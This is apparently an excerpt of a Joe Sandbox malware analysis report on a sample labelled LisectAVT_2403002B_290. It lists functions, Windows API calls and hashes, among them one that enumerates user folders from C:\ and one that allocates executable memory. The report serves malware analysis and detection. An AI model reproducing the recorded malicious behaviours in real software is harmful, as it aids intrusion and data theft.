Opcode Fuzzy Hash: b31f41dcf38431eb20b47a1d01738ebdc9c6014de1d4b334c6a8ea233e26116d
Instruction Fuzzy Hash: DCE04CB12883047BF65017B05C4EFB6362DA714B01F106420B792E91D1CAF85C42473D

Function 0040FAD5 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FADF
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FAEF
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FAF7
LoadIconA.USER32(00000000,0043ABC0), ref: 0040FB03
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FB12

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: e5b006b71caa7b31b3e4d514c68d06393cd2a06c7708e93191fda2f6d2418eba
Instruction ID: b992e7cc074c589086062039aad7a199eea489cb61b4551384fa19084778ec30
Opcode Fuzzy Hash: e5b006b71caa7b31b3e4d514c68d06393cd2a06c7708e93191fda2f6d2418eba
Instruction Fuzzy Hash: EEE04C712896147AF65117B05C4EFFA352DAB14B02F105520F796E91D0CAF85D42477D

Function 0040F6D9 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F6E3
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F6F3
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F6FB
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F707
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F716

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 23d34bf04866c5ae9d00e95c9030021b5f300522d807fc47d3c1f454d20da297
Instruction ID: 3e28eb3131572d2fac298909779aa96aa2a87ebeacc2675cd42585d1acf75fde
Opcode Fuzzy Hash: 23d34bf04866c5ae9d00e95c9030021b5f300522d807fc47d3c1f454d20da297
Instruction Fuzzy Hash: CEE04C716896147AF65117B05C4EFFA352DAB14B01F109420F792E91D0DAF86C42477D

Function 0040FA8D Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FA97
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FAA7
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FAAF
LoadIconA.USER32(00000000,0043ABC0), ref: 0040FABB
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FACA

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 6b3226776a5742b27fbb979d904a7470388a7b538000b63b34d878ba3ff64aa0
Instruction ID: 1d36f7c1484a4d98f76bcf46e8ebade4d22d25235dcfb774b2c89be6bd50a90d
Opcode Fuzzy Hash: 6b3226776a5742b27fbb979d904a7470388a7b538000b63b34d878ba3ff64aa0
Instruction Fuzzy Hash: D3E0EC712886007AF65017B05C0EFFA352CAB14B02F105420F792E90D0CAF85C42473D

Function 0040F691 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F69B
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F6AB
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F6B3
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F6BF
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F6CE

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 1df19ddf3821a151879fa176db2f2840e5e50782decf33660897cd00c31d8261
Instruction ID: c4bcc1e1c1be38c76109329eba7caa4c6fa0630b5fa9804ec52db424150adb96
Opcode Fuzzy Hash: 1df19ddf3821a151879fa176db2f2840e5e50782decf33660897cd00c31d8261
Instruction Fuzzy Hash: 36E042B1289614BAF65117B05C4EFFA362DAB14B02F10A420F792E91D0CAF86C468B7D

Function 0040F356 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F360
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F370
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F378
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F384
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F393

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 34a7cfb35cefde2ddd2ec6d40638f8d98ca118db87320b005e42d95ebf97a8be
Instruction ID: f7383a7ab23df242e51286724413437d4e223c1a3943708dcd5a078a45c667a9
Opcode Fuzzy Hash: 34a7cfb35cefde2ddd2ec6d40638f8d98ca118db87320b005e42d95ebf97a8be
Instruction Fuzzy Hash: 64E042B1288304BAF65117B06C4EFBA362DA714F02F106524F792E91D0CAF96C529B3E

Function 0040FB65 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FB6F
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FB7F
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FB87
LoadIconA.USER32(00000000,0043ABC0), ref: 0040FB93
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FBA2

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: a1636c61c8cbb0665695d0440f991a4229b6176894076ef849f9fa76ba953181
Instruction ID: 4017f48e94712bf2f969ea7e51899ef551f7e2015cd638675003ecdf66d8c9fa
Opcode Fuzzy Hash: a1636c61c8cbb0665695d0440f991a4229b6176894076ef849f9fa76ba953181
Instruction Fuzzy Hash: 4BE04C712896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF85C42477D

Function 0040F769 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F773
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F783
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F78B
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F797
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F7A6

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 4dc3a8707538aa1bd6e265054b12e56723896eeed88543bbfb4ce09428766a02
Instruction ID: 71a0b32a7878cc80f8160acc97d736f4d43d5bc296ae39aaeaecc328a0f48766
Opcode Fuzzy Hash: 4dc3a8707538aa1bd6e265054b12e56723896eeed88543bbfb4ce09428766a02
Instruction Fuzzy Hash: 51E04C716897147AF65117B05C4EFFA352DAB14B01F105520F792E91D0CAF86C42477D

Function 0040F30E Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F318
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F328
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F330
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F33C
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F34B

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 145af19c4a3d465d9ff42e3dc6b765607c6eb6348d29c9401d67edf403f9197c
Instruction ID: 334fcfc35a5dd8afaa864d8e0f73d07486cccace6e0d136221b9713eec3d01bf
Opcode Fuzzy Hash: 145af19c4a3d465d9ff42e3dc6b765607c6eb6348d29c9401d67edf403f9197c
Instruction Fuzzy Hash: EBE042B1289714BAF65117B05C4EFFA362DAB14B02F106420F792E91D0CAF96C428B7E

Function 0040FB1D Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FB27
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FB37
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FB3F
LoadIconA.USER32(00000000,0043ABC0), ref: 0040FB4B
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FB5A

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 05e68aaf83bba0886d3b98f546a04423c6a9d44d9e403c0ac7e3a688c7bd9e88
Instruction ID: 0b98619118816d2a2a2b8005e09654c782942d7a3eccd87f9c26c283519b54bc
Opcode Fuzzy Hash: 05e68aaf83bba0886d3b98f546a04423c6a9d44d9e403c0ac7e3a688c7bd9e88
Instruction Fuzzy Hash: 4DE04C712896147AF65117B05C4EFFA352DAB14B02F105420F792E91D0CAF95D424B7D

Function 0040F721 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F72B
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F73B
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F743
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F74F
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F75E

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 431d2f6382f22f1c527d9f63ec14534cbdb325eac1115864a4e71dff3750b3ed
Instruction ID: b83773e1df3edd97bc25a0b786c3283d31d19127a53598c0ef36f1eb61ead98d
Opcode Fuzzy Hash: 431d2f6382f22f1c527d9f63ec14534cbdb325eac1115864a4e71dff3750b3ed
Instruction Fuzzy Hash: 37E04C716896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF86C42477D

Function 0040F3E6 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F3F0
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F400
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F408
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F414
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F423

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: ffba4c012e2a4b0f6acf445ca24378fc798d4f7e951ca50223e0f86f292853c8
Instruction ID: 2b10cc25e026ddcf9697d52d97dd030663e87e79539ddb17dd0f1381a82fdc3c
Opcode Fuzzy Hash: ffba4c012e2a4b0f6acf445ca24378fc798d4f7e951ca50223e0f86f292853c8
Instruction Fuzzy Hash: C3E04CB1288304BAF65017B05C4EFB6352DA714B01F106520B792E91D1CAF85C42477D

Function 0040F7F9 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F803
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F813
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F81B
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F827
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F836

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 4623f1a551e87028d1c37d3bd4b88e87d5139ecf13376460a3b90faf38a880bd
Instruction ID: 262968f47342c6bcf14978d3074c3fef03dfaca683abf3537834e770978e0ce4
Opcode Fuzzy Hash: 4623f1a551e87028d1c37d3bd4b88e87d5139ecf13376460a3b90faf38a880bd
Instruction Fuzzy Hash: 87E042B1299614BAF65117B09C4EFFA362DEB14B02F106420F792E91D0CAF86D428B7D

Function 0040F39E Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F3A8
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F3B8
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F3C0
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F3CC
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F3DB

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: c962d335c45755fcc61496da2e518791d41e1c3939c3d2040d06c0cb1a6ba80d
Instruction ID: 510ba6cb99a25d9121a1dffcbb3beb8f5a9f0f327987106bb48a6d04e3a7d157
Opcode Fuzzy Hash: c962d335c45755fcc61496da2e518791d41e1c3939c3d2040d06c0cb1a6ba80d
Instruction Fuzzy Hash: 80E04C712897147EF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF86C42477D

Function 0040F7B1 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F7BB
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F7CB
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F7D3
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F7DF
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F7EE

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: fb94d651815346972d6feff6a604d2131db2772f73321fb1a3e3e43d9ff7cf87
Instruction ID: fc2c61729b590515bdfd3972ace7de4b77c4262dfd1b686aa39bd5981164a283
Opcode Fuzzy Hash: fb94d651815346972d6feff6a604d2131db2772f73321fb1a3e3e43d9ff7cf87
Instruction Fuzzy Hash: 40E04CB12896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF86C42477D

Function 00411720 Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0044B2D0), ref: 0041172F
RtlLeaveCriticalSection.NTDLL(0044B2D0), ref: 00411784
RtlDeleteCriticalSection.NTDLL(0044A620), ref: 00411868
RaiseException.KERNEL32(C0000005,00000001,00000000,00000000,?,00000000,00000000,0040EE65), ref: 00411884

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: CriticalSection$DeleteEnterExceptionLeaveRaise
String ID:
API String ID: 3416413283-0
Opcode ID: 247baad83138a39602c62f762ffcceb8fd03f5e9631d7b98b7941db10319a687
Instruction ID: 13516defa6da1fa1ea0f36df8edcfa91a04d8b774725dd04c741ba324b34f0a0
Opcode Fuzzy Hash: 247baad83138a39602c62f762ffcceb8fd03f5e9631d7b98b7941db10319a687
Instruction Fuzzy Hash: 974173B5600208EFDB10AF65E884B9777A9FF04314F04816AFD198B361E778ED80CB59

Function 004335AA Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004335DE
__isleadbyte_l.LIBCMT ref: 00433612
MultiByteToWideChar.KERNEL32(00000080,00000009,0042AC7E,00000000,00000000,00000000,?,?,?,?,0042AC7E,00000000,?), ref: 00433643
MultiByteToWideChar.KERNEL32(00000080,00000009,0042AC7E,00000001,00000000,00000000,?,?,?,?,0042AC7E,00000000,?), ref: 004336B1

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 168a7d6b851788922753df20cd8b2ff507474dd74b81cdd549bdc917c7ae7022
Instruction ID: 311c7ba4c8e43137f5e4a7efccb9debf39a4ffc4a742db9a7ca4f6796694eb12
Opcode Fuzzy Hash: 168a7d6b851788922753df20cd8b2ff507474dd74b81cdd549bdc917c7ae7022
Instruction Fuzzy Hash: 3631C031604246FFDB20DF64C8869AB7BA0FF09312F1495AAE4618B291DB34DE40DB55

Function 00415099 Relevance: 6.1, APIs: 4, Instructions: 83stringCOMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32(?), ref: 004150E7
lstrlenW.KERNEL32(?), ref: 00415103
lstrlenW.KERNEL32(?), ref: 00415121
_memcpy_s.LIBCMT ref: 0041512F

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: lstrlen$String_memcpy_s
String ID:
API String ID: 1108949412-0
Opcode ID: a72ac23a312537908e60c26b74cd9140573bc26e714fe6a4de8df1950316c01f
Instruction ID: dca89a99140dcdefd2515e70e36f7115f501ce712d998d2b27d11117e8ebcf95
Opcode Fuzzy Hash: a72ac23a312537908e60c26b74cd9140573bc26e714fe6a4de8df1950316c01f
Instruction Fuzzy Hash: 95219233305516AFD7209B15FC84FEBF7A8FBD5325F01456BF5048A210D636D89287A4

Function 00423E40 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0000000D,00000000,00411A70), ref: 00423DC1
RtlAllocateHeap.NTDLL(00000000), ref: 00423DC8

Part of subcall function 00423CD9: IsProcessorFeaturePresent.KERNEL32(0000000C,00423DAF,00000000,00411A70), ref: 00423CDB

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00423DEA
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00423E17

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: HeapVirtual$AllocAllocateFeatureFreePresentProcessProcessor
String ID:
API String ID: 2677508003-0
Opcode ID: 77e4cd4afd0e12484e5c990bfcac6811d7f4968818277ea316a279932f6fd003
Instruction ID: 33552fc1f294df3a2b2b113b899d939f80dfa8ae59bb1af21b4907c51dd0f451
Opcode Fuzzy Hash: 77e4cd4afd0e12484e5c990bfcac6811d7f4968818277ea316a279932f6fd003
Instruction Fuzzy Hash: 83016135304221A7EB311F6ABC09B673676EB85B02F950036F901E62A0CB6CCD41869C

Function 0042E1D8 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0042E1FE

Part of subcall function 0042E023: __fltout2.LIBCMT ref: 0042E04F

__cftog_l.LIBCMT ref: 0042E224
__cftoe_l.LIBCMT ref: 0042E256

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 778b9b8891b73742fb5b30d1044a06d15375a4591dad267e5ab082aca22325bf
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 8F11B03250005EFBCF125E86EC11CEE3F26BF18354B888856FE1958131C63AD9B2AB95

Function 0042C34A Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0042C356

Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A

__getptd.LIBCMT ref: 0042C36D
__amsg_exit.LIBCMT ref: 0042C37B
__lock.LIBCMT ref: 0042C38B

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 1571e76f888f1696554205098581bf46176412833ac8a890af7b9e4240ba434f
Instruction ID: 1f90ef54278d78fe482f5476074c301cb1ab8b2a9e1e54857d71ca385ae67bc9
Opcode Fuzzy Hash: 1571e76f888f1696554205098581bf46176412833ac8a890af7b9e4240ba434f
Instruction Fuzzy Hash: 9AF06D32B40720DADB20EBB6B54674E33A0AB00724FD58A5FF800A7291CB6C5802DB5E

Function 0040FFB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 0041004A
_memcpy_s.LIBCMT ref: 00410066

Strings

list<T> too long, xrefs: 0040FFD8, 0041005F, 004100AE

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: Exception@8Throw_memcpy_s
String ID: list<T> too long
API String ID: 4160651998-4027344264
Opcode ID: 77c742a53003cf5b4a42beaa5c9e332160a10667cf4b588755a10ceac9223e1b
Instruction ID: 87061816adbd77505f6fdf6fe6a369285cef3fe4ca098932c01a2f47f64931ca
Opcode Fuzzy Hash: 77c742a53003cf5b4a42beaa5c9e332160a10667cf4b588755a10ceac9223e1b
Instruction Fuzzy Hash: 4E21BF706483008FD710DE15C84076FBAE1BB98308F604E1EF5D557682C7B9DA898B8B

Function 00410AE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 00410B63
_memcpy_s.LIBCMT ref: 00410B7F

Strings

deque<T> too long, xrefs: 00410AE3, 00410B78, 00410BC7

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: Exception@8Throw_memcpy_s
String ID: deque<T> too long
API String ID: 4160651998-309773918
Opcode ID: 5c6964cb9e37735a2a9789e4afb503501908d47ac08314a2fc1e04fe0174ab39
Instruction ID: 76a7e499c38a90962a59699183f8a2dce48751c19508e120701b83a76bc7192f
Opcode Fuzzy Hash: 5c6964cb9e37735a2a9789e4afb503501908d47ac08314a2fc1e04fe0174ab39
Instruction Fuzzy Hash: 3721B0707483409FD710DF55C84066FB7E1AB98308F504E0EF5D117682C7B8E9898B9B

Function 004291EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004291FA

Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A

__getptd.LIBCMT ref: 00429208

Strings

csm, xrefs: 00429216

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 9cd0533e9162e1268b6a8c6e7b7f7a53d39f74832169e6eeb33821c90969245f
Instruction ID: 2cfbca0fe2cdbec7ade19a9cc29750f231db107eaf6571eb885056c95e9ab353
Opcode Fuzzy Hash: 9cd0533e9162e1268b6a8c6e7b7f7a53d39f74832169e6eeb33821c90969245f
Instruction Fuzzy Hash: 4601A234A01328EACF35DF62E44066EB3B9AF00311FD4486FE84096751CF389D91EB69

Analysis Process: XBVdJN.exePID: 6516, Parent PID: 6732COMMON

Execution Graph

Execution Coverage:	31.9%
Dynamic/Decrypted Code Coverage:	10.4%
Signature Coverage:	9.4%
Total number of Nodes:	297
Total number of Limit Nodes:	12

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 006129E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00612A02
wsprintfA.USER32 ref: 00612A1A
memset.MSVCRT ref: 00612A44
lstrlen.KERNEL32(?), ref: 00612A54
lstrcpyn.KERNEL32(?,?,-00000001), ref: 00612A6C
strrchr.MSVCRT ref: 00612A7C
lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00612A9F
lstrlen.KERNEL32(Documents and Settings), ref: 00612AAE
memset.MSVCRT ref: 00612AC6
memset.MSVCRT ref: 00612ADA
FindFirstFileA.KERNEL32(?,?), ref: 00612AEF
memset.MSVCRT ref: 00612B13
lstrcmpiA.KERNEL32(?,?), ref: 00612B42
FindNextFileA.KERNEL32(00000000,?,?,?,?), ref: 00612B67
FindClose.KERNEL32(00000000), ref: 00612B6E

Strings

Documents and Settings, xrefs: 00612A8D, 00612A92, 00612A9A, 00612AAD
C:\, xrefs: 00612A2F
%s*, xrefs: 00612A14

Memory Dump Source

Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

